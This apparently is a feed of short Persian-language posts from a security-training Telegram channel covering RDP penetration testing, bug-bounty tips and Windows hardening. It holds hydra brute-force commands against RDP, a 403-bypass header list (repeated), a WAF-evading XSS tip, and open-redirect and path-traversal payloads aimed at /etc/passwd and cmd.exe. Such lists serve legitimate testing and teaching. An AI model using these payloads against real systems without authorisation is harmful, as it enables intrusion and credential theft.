Try Hack Box

The Windows startup process tree. @TryHackBox #شکار_تهدید #ویندوز

🔖 پروتکل ریموت دسکتاپ - تست نفوذ RDP پروتکل ریموت دکستاپ RDP پروتکلی است که به کاربر یک رابط گرافیکی ارائه می‌ دهد تا از طریق اتصال شبکه به کامپیوتر دیگری متصل شود. پورت پیش‌ فرض آن ۳۳۸۹ است. Enumeration

nmap --script rdp-enum-encryption -p 3389 <target-ip>
nmap --script rdp-ntlm-info -p 3389 <target-ip>
nmap --script rdp* -p 3389 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> rdp
hydra -L usernames.txt -p password <target-ip> rdp

Connect Remmina Remmina : یک کلاینت ریپوت دکستاپ برای سیستم‌ عامل‌ های کامپیوتری مبتنی بر POSIX است.. remmina :

# -c: Connect given URI or file remmina -c rdp://username@vulnerable.com remmina -c rdp://domain\\username@vulnerable.com remmina -c rdp://username:password@vulnerable.com # --------------------------------------------------------------------------------- # Settings # Keyboard mapping 1. On Remmina client window, click menu icon and move to "Preferences". 2. Navigate to "RDP" tab and check "Use client keyboard mapping". 3. Reboot Remmina

FreeRDP

xfreerdp /u:username /v:10.0.0.1:3389 xfreerdp /u:username /p:password /cert:ignore /v:10.0.0.1 /workarea # Create a shared drive (/drive:LOCAL_DIR,SHARE_NAME) xfreerdp /u:username /p:password /drive:.,share /v:10.0.0.1 # Useful command for exploiting xfreerdp /v:10.0.0.1 /u:username /p:password +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share # -------------------------------------------------------------------------------- # On remote Windows # Access share directory in Command Prompt or PowerShell \\tsclient\\~share\

Rdesktop

rdesktop -u username -p password 10.0.0.1:3389

#RDP @KavehOffSec

🐧 چگونه از طریق CLI بررسی کنیم که پورتی در لینوکس/یونیکس استفاده می‌شود یا خیر مهم نیست برای چه هدفی به این اطلاعات نیاز دارید شناسایی نفوذ یا بررسی اینکه کدام سرویس روی کدام پورت گوش می‌دهد، دستور مربوطه همیشه باید در دسترس باشد. در اینجا چند روش آمده است :

$ sudo lsof -i -P -n | grep LISTEN
$ sudo netstat -tulpn | grep LISTEN
$ sudo ss -tulpn | grep LISTEN
$ sudo lsof -i:22
$ sudo nmap -sTU -O IP-address

#لینوکس @TryHackBox

🔊 جهت گسترش بخش آموزشی، از افرادی که علاقه و توانایی در تولید محتوای منظم دارند دعوت می‌شود برای همکاری همراه شوند. اگر مایل به مشارکت هستید، جهت هماهنگی پیام دهید: 📩 @THBxSupport

SIEM Use Case Categorization @TryHackBox

فزونه‌های مرورگر می‌توانند نقطه ضعف امنیتی بزرگی باشند و توسعه‌دهندگان باید: اصل "کمترین دسترسی" را رعایت کنند از انتقال و ذخیره‌سازی ناامن داده‌ها جلوگیری کنند در برابر تزریق کد و XSS محافظت کنند وابستگی‌های شخص ثالث امن را مدیریت کنند شفافیت کامل در مورد جمع‌آوری داده داشته باشند این راهنمایی‌ها برای توسعه‌دهندگان افزونه و همچنین کاربرانی که می‌خواهند افزونه‌های امن‌تری انتخاب کنند، بسیار مفید است. ✍️نویسنده @TryHackBox | The Chaos

📚 کتابچه "Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته. اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید! منبعی کامل برای تیم‌های قرمز (Red Team)، شامل دستورات عملی، اسکریپت‌های آماده، و تکنیک‌های evasion است که مستقیماً در تست‌های نفوذ استفاده میشوند. همین حالا این کتاب تخصصی را به زبان فارسی بخوانید. 🔥 تخفیف به مناسبت 5.5k شدنمون :  💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان  💥 با تخفیف: فقط ۲۰۰،۰۰۰ تومان  📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید: @THBxSupport

نقشه ذهنی (MindMap) آرتیفکت‌ های DFIR #ویندوز مجموعه‌ ای از آرتیفکت‌ها که در هنگام اجرای عملیات دیجیتال فارنزیک و پاسخ به رویدادهای امنیتی (DFIR) در سیستم‌ های ویندوز، باید مورد توجه قرار گیرند. @TryHackBox #پاسخ_به_حادثه #dfir

🔖 از این هدرهای درخواست برای عبور از خطای 403 Forbidden استفاده کنید

Base-Url: 127.0.0.1 Client-IP: 127.0.0.1 Http-Url: 127.0.0.1 Proxy-Host: 127.0.0.1 Proxy-Url: 127.0.0.1 Real-Ip: 127.0.0.1 Redirect: 127.0.0.1 Referer: 127.0.0.1 Referrer: 127.0.0.1 Refferer: 127.0.0.1 Request-Uri: 127.0.0.1 Uri: 127.0.0.1 Url: 127.0.0.1 X-Client-IP: 127.0.0.1 X-Custom-IP-Authorization: 127.0.0.1 X-Forward-For: 127.0.0.1 X-Forwarded-By: 127.0.0.1 X-Forwarded-For-Original: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Forwarded-Host: 127.0.0.1 X-Forwarded-Port: 443 X-Forwarded-Port: 4443 X-Forwarded-Port: 80 X-Forwarded-Port: 8080 X-Forwarded-Port: 8443 X-Forwarded-Scheme: http X-Forwarded-Scheme: https X-Forwarded-Server: 127.0.0.1 X-Forwarded: 127.0.0.1 X-Forwarder-For: 127.0.0.1 X-Host: 127.0.0.1 X-Http-Destinationurl: 127.0.0.1 X-Http-Host-Override: 127.0.0.1 X-Original-Remote-Addr: 127.0.0.1 X-Original-Url: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Proxy-Url: 127.0.0.1 X-Real-Ip: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Rewrite-Url: 127.0.0.1 X-True-IP: 127.0.0.1

@TryHackBox #باگ_بانتی #نکته

🔖 از این هدرهای درخواست برای عبور از خطای 403 Forbidden استفاده کنید

Base-Url: 127.0.0.1 Client-IP: 127.0.0.1 Http-Url: 127.0.0.1 Proxy-Host: 127.0.0.1 Proxy-Url: 127.0.0.1 Real-Ip: 127.0.0.1 Redirect: 127.0.0.1 Referer: 127.0.0.1 Referrer: 127.0.0.1 Refferer: 127.0.0.1 Request-Uri: 127.0.0.1 Uri: 127.0.0.1 Url: 127.0.0.1 X-Client-IP: 127.0.0.1 X-Custom-IP-Authorization: 127.0.0.1 X-Forward-For: 127.0.0.1 X-Forwarded-By: 127.0.0.1 X-Forwarded-For-Original: 127.0.0.1 X-Forwarded-For: 127.0.0.1 X-Forwarded-Host: 127.0.0.1 X-Forwarded-Port: 443 X-Forwarded-Port: 4443 X-Forwarded-Port: 80 X-Forwarded-Port: 8080 X-Forwarded-Port: 8443 X-Forwarded-Scheme: http X-Forwarded-Scheme: https X-Forwarded-Server: 127.0.0.1 X-Forwarded: 127.0.0.1 X-Forwarder-For: 127.0.0.1 X-Host: 127.0.0.1 X-Http-Destinationurl: 127.0.0.1 X-Http-Host-Override: 127.0.0.1 X-Original-Remote-Addr: 127.0.0.1 X-Original-Url: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Proxy-Url: 127.0.0.1 X-Real-Ip: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Rewrite-Url: 127.0.0.1 X-True-IP: 127.0.0.1

@TryHackBox #باگ_بانتی #نکته

🔖 در تلاش برای بایپس WAF و تزریق پیلود XSS، تگ <details> را فراموش نکنید. اغلب توسط WAF مسدود نمیشود! @TryHackBox #باگ_بانتی #نکته

🟥 بسیاری از نفوذهای موفق به شبکه‌های ویندوزی، نه به دلیل باگ‌های نرم‌افزاری، بلکه به دلیل پیکربندی‌های ضعیف و اشتباه در سرویس Active Directory رخ می‌دهند. 🟦کلید اصلی امنیت، غیرفعال کردن پروتکل‌های قدیمی و ناامن (مانند NTLM و LLMNR) 🟩اعمال اصل "کمترین دسترسی" یا همان "Least Privilege" در سخت افزار ها و انجام ممیزی و بازبینی منظم تنظیمات و مجوزها است. ✍️نویسنده @TryHackBox | The Chaos #Active_Directory #AD #Windows #CyberSecurity

🔖 لیست تکنیک‌ های شناسایی (recon) که تقریباً هیچ‌ کسی امتحان نمیکنه • اجرای CeWL روی product & API docs • شمارش VHost و Bruteforcing با هدر هاست تنظیم‌ شده روی "localhost" • بروت‌ فورس با متدهای HTTP مختلف (POST, PUT, PATCH, ...) • شناسایی از روی Favicon • کراولینگ سایت‌ ها با هدرهای user-agent مختلف @TryHackBox #باگ_بانتی #شناسایی

🔖 میتونی این Bypass دستی مؤثر برای open redirect رو امتحان کنی 💢 ۱. تزریق Null-byte:    ⦁ /google.com%00/    ⦁ //google.com%00 💢 ۲. تغییرات(variations) انکودینگ Base64:    ⦁ aHR0cDovL2dvb2dsZS5jb20=    ⦁ aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    ⦁ //base64:d3d3Lmdvb2dsZS5jb20=/ 💢 ۳. تغییرات حساس به حروف کوچک/بزرگ:    ⦁ //GOOGLE.com/    ⦁ //GoOgLe.com/ 💢 ۴.  توالی های UTF-8 طولانی:    ⦁ %C0%AE%C0%AE%2F (انکودینگ طولانی برای../)    ⦁ %C0%AF%C0%AF%2F%2Fgoogle.com 💢 ۵. طرح‌ های انکودینگ مخلوط:    ⦁ /%68%74%74%70://google.com    ⦁ //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    ⦁ //base64:%2F%2Fgoogle.com/ 💢 ۶. نوتاسیون‌ های(notations) جایگزین دامنه:    ⦁ //google.com@127.0.0.1/    ⦁ //127.0.0.1.xip.io/    ⦁ //0x7F000001/ (IP هگزادسیمال) 💢 ۷. کاراکترهای خاص Trailing:    ⦁ //google.com/#/    ⦁ //google.com/;&/    ⦁ //google.com/?id=123&// 💢 ۸. فرمت آدرس IP اکتال( Octal ):    ⦁ http://0177.0.0.1/    ⦁ http://00177.0000.0000.0001/ 💢 ۹. تغییرات آدرس IP:    ⦁ http://3232235777 (نوتاسیون دسیمال IP)    ⦁ http://0xC0A80001 (نوتاسیون هگز IP)    ⦁ http://192.168.1.1/ 💢 ۱۰. Path traversal با انکودینگ:     ⦁ /..%252f..%252f..%252fetc/passwd     ⦁ /%252e%252e/%252e%252e/%252e%252e/etc/passwd     ⦁ /..%5c..%5c..%5cwindows/system32/cmd.exe 💢 ۱۱. گنجاندن پروتکل inclusion:     ⦁ ftp://google.com/     ⦁ javascript:alert(1)//google.com 💢 ۱۲. URLهای نسبی پروتکل:      -:////google.com/      -:///google.com/ 💢 ۱۳. موارد لبه redirect:     ⦁ //google.com/?q=//bing.com/     ⦁ //google.com?q=https://another-site.com/ 💢 ۱۴. نوتاسیون IPv6:     ⦁ http://[::1]/     ⦁ http://[::ffff:192.168.1.1]/ 💢 ۱۵. انکودینگ دوگانه URL:     ⦁ %252f%252fgoogle.com (دو بار انکود شده)     ⦁ %255cgoogle.com 💢 ۱۶. ترکیب traversal و انکودینگ:     ⦁ /%2E%2E/%2E%2E/etc/passwd     ⦁ /%2e%2e%5c%2e%2e/etc/passwd 💢 ۱۷. مبتنی بر Reverse DNS:     ⦁ https://google.com.reverselookup.com     ⦁ //lookup-reversed.google.com/ 💢 ۱۸. پورت‌ های غیراستاندارد:     ⦁ http://google.com:81/     ⦁ https://google.com:444/ 💢 ۱۹. پنهان‌ سازی یونیکد در مسیرها:     ⦁ /%E2%80%8Egoogle.com/     ⦁ /%C2%A0google.com/ 💢 ۲۰. پنهان‌ سازی پارامترهای کوئری:     ⦁ //google.com/?q=http://another-site.com/     ⦁ //google.com/?redirect=https://google.com/ 💢 ۲۱. استفاده از سمبل @ برای userinfo:     ⦁ https://admin:password@google.com/     ⦁ http://@google.com 💢 ۲۲. ترکیب userinfo و traversal:     ⦁ https://admin:password@google.com/../../etc/passwd @TryHackBox #بایپس

اگه دنبال اخبار، دوره های رایگان، لایوها، کنفرانس ها و آموزش در حوزه امنیت سایبری هستید، به ما ملحق بشید : ➡️ @onhex_ir ➡️ WebSite

دوستانی که علاقه مند به تدریس و تولید محتوا هستند به ایدی زیر پیام بدند : @THBxSupport

نکته #باگ_بانتی استخراج URLهای فایل‌ های جاوااسکریپت از هر صفحه! فراموش کن DevTools رو باز کنی از این بوک‌مارکت استفاده کن تا فوری همه URLهای فایل.js رو استخراج کنی و تو یه فایل.txt دانلودشون کنی. چرا مهمه: سریع همه فایل‌های جاوااسکریپت لینک‌ شده رو جمع کن  ازشون برای تحلیل استاتیک(LinkFinder، SecretFinder و غیره)استفاده کن  عالی برای recon،کشف endpoint و دور زدن احراز هویت کد بوک‌ مارکت:

javascript:(function(){let urls=[];document.querySelectorAll('*').forEach(e=>{urls.push(e.src,e.href,e.url)});urls=[...new Set(urls)].filter(u=>u&&u.endsWith('.js')).join('\n');let blob=new Blob([urls],{type:'text/plain'});let a=document.createElement('a');a.href=URL.createObjectURL(blob);a.download='javascript_urls.txt';a.click();})();

چطور استفاده کن:  یه بوک‌مارکت جدید تو مرورگرت بساز.  کد بالا رو تو فیلد URL بچسبون.  به سایت هدف برو و بوک‌مارکت رو کلیک کن.  فایل javascript_urls.txt با همه لینک‌های.js دانلود میشه. حالا می‌تونی اینو به:  LinkFinder  SecretFinder  JSParser  یا تحلیل دستی بدی! @TryHackBox